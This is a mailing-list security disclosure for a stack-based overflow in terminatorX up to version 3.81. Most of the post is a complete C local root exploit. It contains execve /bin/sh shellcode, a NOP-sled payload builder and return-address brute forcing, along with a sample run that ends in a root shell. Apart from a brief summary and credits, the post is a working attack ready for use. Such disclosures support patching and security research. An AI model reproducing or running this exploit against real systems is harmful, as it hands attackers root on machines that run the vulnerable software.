<<< Date Index >>>     <<< Thread Index >>>

terminatorX stack-based overflow (exploit)




 terminatorX Exploitable Stack-Based Overflow (load_tt_part())
 ------------------------------------------------------------------------


 SUMMARY

 There is a stack-based overflow which is likely to be exploited locally
in order to cause the product to execute malicious code, allowing a 
local attacker to gain elevated privileges. Several vulnerabilities has  been 
reported: three stack-based overflows and a format string bug. The
following code can be used to test the software for the stack-based
overflow vulnerability located in the load_tt_part() function of the 
src/mastergui.cc file. For further informations, please read the related
advisory which can be reached here [1].


 DETAILS

 Vulnerable systems:
 * terminatorX version <= 3.81 (current version)


 EXPLOIT

 The following piece of code is attached to this mail.

/* TerminatorX V. <= 3.81 local root exploit by Li0n7
 *
 * Typical local stack-based overflow 
 *
 * Bugs discovered by c0wboy (c0wboy@xxxxxxxxxx) from 0x333 (www.0x333.org)
 *
 * Related advisory: 
http://www.packetstormsecurity.nl/0311-advisories/outsiders-terminatorX-001.txt
 *
 * Visit us: www.ioc.fr.st
 * 
 * Contact me Li0n7[at]voila[dot]fr
 *
 * Usage: ./terminatorX-exp [-r <RET>][-b [-s <STARTING_RET>]]
 *
 * -r <RET>: no bruteforcing, try to execute shellcode with <RET> as return 
address
 * -b: enables bruteforcing
 * -s: bruteforces by using return address from <STARTING_RET> to 0x00000000
 * 
 * Example: 
 *
 *root@li0n7:/tmp/test/exploits# ./terminatorX-exp -b
 *
 *    exploit: terminatorX V. <= 3.81 local root exploit by Li0n7
 *    discoverer: c0wb0y (www.0x333.org)
 *    visit us: http://www.ioc.fr.st
 *    contact me: Li0n7[at]voila[dot]fr
 *    usage: ./xterminator2 [-r <RET>][-b [-s <STARTING_RET>]]
 *
 *[+] Starting bruteforcing...
 *[+] Testing 0xbffff734...
 *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König
 *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license.
 *...
 *[+] Testing 0xbffff66c...
 *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König
 *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license.
 *...                                    
 *tX: err: Error parsing terminatorXrc.
 *tX: Failed loading terminatorXrc - trying to load old binary rc.
 *+ tX_warning: LADSPA_PATH not set. Trying 
/usr/lib/ladspa:/usr/local/lib/ladspa
 ** tX_error: tX: Error: couldn't access directory "/usr/lib/ladspa".
 *+ tX_warning: Plugin "Sine Oscillator (Freq:audio, Amp:audio)" disabled. Not 
a 1-in/1-out plugin.
 *+ tX_warning: Plugin "Sine Oscillator (Freq:control, Amp:control)" disabled. 
Not a 1-in/1-out plugin.
 *+ tX_warning: Plugin "Stereo Amplifier" disabled. Not a 1-in/1-out plugin.
 *+ tX_warning: Plugin "White Noise Source" disabled. Not a 1-in/1-out plugin.
 *warning: failed to load external entity 
"%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%901%C0Ph//shh/bin%89%E3PS%89%E1%99%B0%0B%CD%80l%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BFl%F6%FF%BF"
 *
 *** (terminatorX:3085): WARNING **: Invalid UTF8 string passed to 
pango_layout_set_text()
 *sh-2.05b# exit
 *exit
 *[+] Exited: shell's ret code = 0
 *[+] Ret address found: 0xbffff66c
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>

#define BSIZE 200
#define D_START 0xbffff734
#define PATH "/usr/local/bin/terminatorX"
#define RET 0xbffff69e

char shellcode[]=
      "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
      "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

char *buffer,*ptr;

void 
checkme(char *buffer)
{
      if(!buffer)
      {
          fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
          exit(0);
      }
      return;
}


void 
exec_vuln()
{
      execl(PATH,PATH,"-f",buffer,NULL);
}


int 
tease()
{
      pid_t pid;
      pid_t wpid;
      int status;

      pid = fork();

      if ( pid == -1 ) {
          fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
          exit(13);

      } else if ( pid == 0 ) {

          exec_vuln();

      } else  {

         wpid = wait(&status);
         if ( wpid == -1 ) {

             fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
             return 1;

         } else if ( wpid != pid )

             abort();

        else {

            if ( WIFEXITED(status) ) {

                printf("[+] Exited: shell's ret code = %d\n", 
WEXITSTATUS(status));
                return WEXITSTATUS(status);

            } else if ( WIFSIGNALED(status) ) {

                return WTERMSIG(status);
            } else {

                fprintf(stderr, "[-] Stopped.\n");

            }
        }
      }
      return 1;
}


int 
make_string(long ret_addr)
{
      int i;
      long ret,addr,*addr_ptr;    
      
      buffer = (char *)malloc(512);
      if(!buffer)
      {
          fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
          exit(-1);
      }

      ret = ret_addr;

      ptr = buffer;

      memset(ptr,0x90,BSIZE-strlen(shellcode));
      ptr += BSIZE-strlen(shellcode);

      for(i=0;i<strlen(shellcode);i++)
          *ptr++ = shellcode[i];

      addr_ptr = (long *)ptr;
      for(i=0;i<20;i++)
          *(addr_ptr++) = ret;
      ptr = (char *)addr_ptr;
      *ptr = 0;
      return 0;
}


int 
bruteforce(long start)
{
      int ret;
      long i;

      fprintf(stdout,"[+] Starting bruteforcing...\n");
 
      for(i=start;i<0;i=i-50) 
      {
          fprintf(stdout,"[+] Testing 0x%x...\n",i);
          make_string(i);
          ret=tease();
          if(ret==0)
          {
              fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
              break;
          }
      }
      
      return 0;
}

void 
banner(char *argv0)
{
      fprintf(stderr,"\n    exploit: terminatorX V. <= 3.81 local root exploit 
by Li0n7\n");
      fprintf(stderr,"    discoverer: c0wb0y (www.0x333.org)\n");
      fprintf(stderr,"    visit us: http://www.ioc.fr.st\n";);
      fprintf(stderr,"    contact me: Li0n7[at]voila[dot]fr\n");
      fprintf(stderr,"    usage: %s [-r <RET>][-b [-s 
<STARTING_RET>]]\n\n",argv0);
}

int 
main(int argc,char *argv[])
{
      char * option_list = "br:s:";
      int option,brute = 0, opterr = 0;
      long ret,start = D_START;

      banner(argv[0]);
      if (argc < 1) exit(-1);

      while((option = getopt(argc,argv,option_list)) != -1)
          switch(option)
          {
              case 'b':
                  brute = 1;
                  break;
              case 'r':
                  ret = strtoul(optarg,NULL,0);
                  make_string(ret);
                  tease();
                  exit(0);
                  break;
              case 's':
                  start = strtoul(optarg,NULL,0);
                  break;
              case '?':
                  fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
                  banner(argv[0]);
                  exit(-1);
          }

      if(brute) 
          bruteforce(start);

      return 0;
}
 



 CREDITS

 Vulnerabilities reported by c0wboy (c0wboy@xxxxxxxxxx) from 0x333 [2].

 REFERENCES

 [1] http://www.packetstormsecurity.nl/0311-advisories/outsiders-terminatorX-001

 [2] http://www.0x333.org